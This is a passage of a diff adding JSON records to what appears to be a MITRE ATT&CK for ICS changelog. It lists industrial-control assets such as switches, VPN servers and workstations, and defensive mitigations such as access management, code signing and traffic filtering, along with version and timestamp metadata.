+                            "description": "Emergency Shutdown System controllers are used to read sensor values and interact with control surfaces to return the system \u201cto a safe static condition so that any remedial action can be taken\u201d. (Citation: SIGTTO ESD 2021)"
+                        },
+                        {
+                            "name": "Burner Management Systems (BMS) controller",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Burner Management System controllers are used to interact with sensors and control surfaces to maintain safe operating conditions for the burner. These can include safely starting-up and managing the main flame, controlling and monitoring the burning conditions, and safely initiating planned or unplanned shutdown sequences."
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 15:10:05.534000+00:00\", \"old_value\": \"2023-09-28T15:10:05.534Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T17:25:50.475Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--bb553fda-8355-40bc-87c6-5ae25124fa95",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-09-24 17:53:28.482000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0015",
+                            "external_id": "A0015"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Switch",
+                    "description": "A switch is a network device that connects endpoints (e.g., workstations, servers, HMIs, PLCs, etc.) so that they can communicate and share data and resources. Switches may operate at either Layer 2 or Layer 3 of the OSI Model and intelligently forward packets across the network based on the specified address (Media Access Control (MAC) address for Layer 2 and Internet Protocol (IP) address for Layer 3). Switches are typically used to define network segments and connect the devices within a particular level of the Purdue Model.  ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Network"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Core Switch",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A core switch is a device that provides high-speed and reliable connectivity and can be connected with other core switches to make up the backbone of large enterprise/ICS networks. "
+                        },
+                        {
+                            "name": "Access Switch",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "An access switch is a device that allows end users via endpoints (e.g., workstations, servers, etc.) to connect to the network and share data and resources."
+                        },
+                        {
+                            "name": "Layer 2 Switch",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A Layer 2 switch is a device that forwards data packets on the network based on the specified destination MAC address."
+                        },
+                        {
+                            "name": "Layer 3 Switch",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A Layer 3 switch is a device that forwards data packets on the network based on the specified source and destination IP addresses."
+                        },
+                        {
+                            "name": "Distribution Switch",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A distribution switch is a device that connects access switches with core switches and is responsible for controlling traffic between networks."
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-09-24 17:53:28.482000+00:00\", \"old_value\": \"2025-09-24T17:53:28.482Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-27T18:01:55.383Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 15:13:07.950000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0011",
+                            "external_id": "A0011"
+                        },
+                        {
+                            "source_name": "IEC February 2019",
+                            "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ",
+                            "url": "https://webstore.iec.ch/publication/34421"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Virtual Private Network (VPN) Server",
+                    "description": "A VPN server is a device that is used to establish a secure network tunnel between itself and other remote VPN devices, including field VPNs. VPN servers can be used to establish a secure connection with a single remote device, or to securely bridge all traffic between two separate networks together by encapsulating all data between those networks. VPN servers typically support remote network services that are used by field VPNs to initiate the establishment of the secure VPN tunnel between the field device and server.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Embedded",
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Virtual Private Network (VPN) terminator",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "A VPN terminator is a device performs the role of either a VPN client or server to support the establishment of VPN connection. (Citation: IEC February 2019)"
+                        },
+                        {
+                            "name": "Field VPN",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "Field VPN are typically deployed at remote outstations and are used to create secure connections to VPN servers within data/control center environments.  "
+                        }
+                    ],
+                    "x_mitre_version": "1.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 15:13:07.950000+00:00\", \"old_value\": \"2023-09-28T15:13:07.950Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T00:57:53.372Z\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-asset",
+                    "id": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-28 14:22:49.837000+00:00",
+                    "modified": "2026-05-12 15:12:00.768000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/assets/A0001",
+                            "external_id": "A0001"
+                        },
+                        {
+                            "source_name": "North American Electric Reliability Corporation June 2021",
+                            "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ",
+                            "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Workstation",
+                    "description": "Workstations are devices used by human operators or engineers to perform various configuration, programming, maintenance, diagnostic, or operational tasks. Workstations typically utilize standard desktop or laptop hardware and operating systems (e.g., MS Windows), but run dedicated control system applications or diagnostic/management software     to support interfacing with the control servers or field devices. Some workstations have a fixed location within the network architecture, while others are transient devices that are directly connected to various field devices to support local management activities.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows"
+                    ],
+                    "x_mitre_related_assets": [
+                        {
+                            "name": "Transient Cyber Asset (TCA)",
+                            "related_asset_sectors": [
+                                "Electric"
+                            ],
+                            "description": "A Transient Cyber Asset (TCA)(Citation: North American Electric Reliability Corporation June 2021) is a mobile workstation that is used to support management functions across multiple different networks, rather than being dedicated to any specific device/network. The TCA is often used to directly manage ICS environments that do not have any dedicated support for external remote access. Therefore, the TCA provides a mechanism for connectivity and file transfer to many networks/devices, even if they are segmented or \u201cair gapped\u201d from other networks.  "
+                        },
+                        {
+                            "name": "Engineering Workstation (EWS)",
+                            "related_asset_sectors": [
+                                "General"
+                            ],
+                            "description": "An Engineering Workstation (EWS) is used to perform various maintenance, configuration, or diagnostics functions for a control system. The EWS will likely require dedicated application software to interface with various devices (e.g., RTUs, PLCs), and may be used to transfer data or files between the control system devices and other networks. "
+                        }
+                    ],
+                    "x_mitre_version": "2.1",
+                    "x_mitre_sectors": [
+                        "General"
+                    ],
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2023-09-28 14:22:49.837000+00:00\", \"old_value\": \"2023-09-28T14:22:49.837Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.768000+00:00\", \"old_value\": \"2026-04-23T01:04:34.868Z\"}}}",
+                    "previous_version": "2.1"
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "mitigations": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Access Management",
+                    "description": "Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provide sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 2.1",
+                        "IEC 62443-4-2:2019 - CR 2.1",
+                        "NIST SP 800-53 Rev. 5 - AC-3"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0801",
+                            "external_id": "M0801"
+                        },
+                        {
+                            "source_name": "Centre for the Protection of National Infrastructure November 2010",
+                            "description": "Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 2020/09/25 ",
+                            "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/RP_Managing_Remote_Access_S508NC.pdf"
+                        },
+                        {
+                            "source_name": "McCarthy, J et al. July 2018",
+                            "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ",
+                            "url": "https://doi.org/10.6028/NIST.SP.1800-2"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 00:47:44.798000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 17:06:14.029000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Audit",
+                    "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 3.4",
+                        "IEC 62443-4-2:2019 - CR 3.4",
+                        "NIST SP 800-53 Rev. 4 - SI-7",
+                        "NIST SP 800-53 Rev. 5 - SI-7"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0947",
+                            "external_id": "M0947"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:54:39.756000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Authorization Enforcement",
+                    "description": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies.  Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector  (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 2.1",
+                        "IEC 62443-4-2:2019 - CR 2.1",
+                        "NIST SP 800-53 Rev. 5 - AC-3"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0800",
+                            "external_id": "M0800"
+                        },
+                        {
+                            "source_name": "Institute of Electrical and Electronics Engineers January 2014",
+                            "description": "Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 2020/09/17 ",
+                            "url": "https://standards.ieee.org/standard/1686-2013.html"
+                        },
+                        {
+                            "source_name": "International Electrotechnical Commission July 2020",
+                            "description": "International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17 ",
+                            "url": "https://webstore.iec.ch/publication/6912"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:54:03.965000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 17:02:36.984000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Boot Integrity",
+                    "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-4-2:2019 - CR 3.14",
+                        "NIST SP 800-53 Rev. 5 - SI-7"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0946",
+                            "external_id": "M0946"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:55:57.931000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 17:01:25.405000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Code Signing",
+                    "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 3.4",
+                        "IEC 62443-4-2:2019 - CR 3.4",
+                        "NIST SP 800-53 Rev. 5 - SI-7"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0945",
+                            "external_id": "M0945"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:54:56.965000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Communication Authenticity",
+                    "description": "When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 3.1",
+                        "IEC 62443-4-2:2019 - CR 3.1",
+                        "NIST SP 800-53 Rev. 5 - SC-8; SC-23"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0802",
+                            "external_id": "M0802"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:54:21.289000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Encrypt Network Traffic",
+                    "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 4.1",
+                        "IEC 62443-4-2:2019 - CR 4.1",
+                        "NIST SP 800-53 Rev. 5 - SC-8"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0808",
+                            "external_id": "M0808"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:55:38.098000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 16:43:44.834000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Encrypt Sensitive Information",
+                    "description": "Protect sensitive data-at-rest with strong encryption.",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 4.1",
+                        "IEC 62443-4-2:2019 - CR 4.1",
+                        "NIST SP 800-53 Rev. 5 - SC-28"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0941",
+                            "external_id": "M0941"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 00:56:16.357000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-11 16:33:55.337000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Filter Network Traffic",
+                    "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.   Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication  attempts, shutdown messages, invalid commands).  Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 5.1",
+                        "IEC 62443-4-2:2019 - CR 5.1",
+                        "NIST SP 800-53 Rev. 5 - AC-3; SC-7"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0937",
+                            "external_id": "M0937"
+                        },
+                        {
+                            "source_name": "Centre for the Protection of National Infrastructure February 2005",
+                            "description": "Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ",
+                            "url": "https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 00:45:45.801000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Human User Authentication",
+                    "description": "Require user authentication before allowing access to data or accepting commands to a device. While strong multi-factor authentication is preferable, it is not always feasible within ICS environments. Performing strong user authentication also requires additional security controls and processes which are often the target of related adversarial techniques (e.g., Valid Accounts, Default Credentials). Therefore, associated ATT&CK mitigations should be considered in addition to this, including [Multi-factor Authentication](https://attack.mitre.org/mitigations/M0932), [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), [User Account Management](https://attack.mitre.org/mitigations/M0918), [Privileged Account Management](https://attack.mitre.org/mitigations/M0926), and [User Account Control](https://attack.mitre.org/mitigations/M1052).",
+                    "revoked": false,
+                    "labels": [
+                        "IEC 62443-3-3:2013 - SR 1.1",
+                        "IEC 62443-4-2:2019 - CR 1.1",
+                        "NIST SP 800-53 Rev. 5 - IA-2"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0804",
+                            "external_id": "M0804"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2026-04-23 00:50:55.165000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-09-11 16:32:21.854000+00:00",
+                    "modified": "2026-05-12 15:12:00.730000+00:00",
+                    "name": "Mitigation Limited or Not Effective",
+                    "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/mitigations/M0816",
+                            "external_id": "M0816"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.730000+00:00\", \"old_value\": \"2025-04-25 14:39:13.833000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "course-of-action",
+                    "id": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-06-10 20:53:36.319000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "Network Allowlists",
